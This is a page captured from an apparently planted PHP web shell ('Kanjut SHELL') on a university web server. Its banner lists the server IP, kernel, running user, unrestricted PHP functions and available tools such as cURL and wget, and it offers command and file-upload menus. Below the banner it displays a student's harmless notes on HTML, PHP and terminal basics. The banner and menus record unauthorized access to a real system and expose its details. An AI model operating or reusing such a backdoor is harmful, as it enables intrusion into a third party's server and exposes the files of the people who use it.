Kanjut SHELL
Server IP : 172.16.15.8  /  Your IP : 18.224.63.123
Web Server : Apache
System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.2.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0705) :  /home/bsainsworth/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/bsainsworth/nano_Scratch.txt.bak
☻
https:zeus.vwu.edu/~bsainsworth/
Title comments:
<--! 	FileName.html
	Author: My Name
	Instructor: Dr. Wang
	Date: Today's Date Febuary 6 2023
-->

General tips:
$_SESSION [n] = $n=$_SE //?
name   =>   $_POST['name']   =>   used inside




Absolute URL: Full address bar URL
https://zeus.vwu.edu/~bsainsworth/index.html
Relative URL: Partial address bar, relative to current location.
Assignment1.html (from address above)

terminal Cheatsheet/reminders
rm: remove file
mv: move file
cp: copy file
ls: list subdirectories
ll: list... with details: -t (sort by time)
clear: clear screen
pwd: Path With Directories
~: home; ~/www/ClassCode/ works from anywhere to look at directory ClassCode
cat: (conCATenate) print file to console

HTML Terms:
Comment: <--! -->
<CENTER>, <H>, <P>, <Font color=blue>

../	Relative path step back one
/ 	Absolute path form root
May exit php and use HTML to print to screen
memory maintained

PHP
<?php ?>
Comment:
M_PI: 3.14159...

Functions:
number_format = [number variable] = ([number variable], nums decimal)


hyperlink:
<A HREF=linktohere.filetype>Link As Shown</A>



Questions & Comments:
How does the anchor work? It appears that the hyperlink pointer is part of the anchor of the
link's text.


Stv3n404 - 2023